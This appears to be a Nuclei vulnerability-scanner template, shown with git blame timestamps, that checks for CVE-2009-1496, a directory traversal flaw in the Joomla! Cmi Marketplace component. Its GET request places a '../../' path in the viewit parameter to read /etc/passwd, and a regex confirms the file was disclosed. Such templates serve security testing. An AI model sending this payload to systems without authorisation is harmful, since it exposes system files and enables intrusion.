nuclei-templates/cves/2009/CVE-2009-1496.yaml

28 lines
814 B
YAML
Raw Normal View History

2021-09-27 11:02:48 +00:00
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
2021-09-27 12:32:35 +00:00
reference:
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
2021-09-27 12:32:35 +00:00
tags: cve,cve2009,joomla,lfi
2021-09-27 11:02:48 +00:00
requests:
- method: GET
path:
2021-09-27 12:32:35 +00:00
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
2021-09-27 11:02:48 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-09-27 11:02:48 +00:00
- type: status
status:
2021-09-27 12:32:35 +00:00
- 200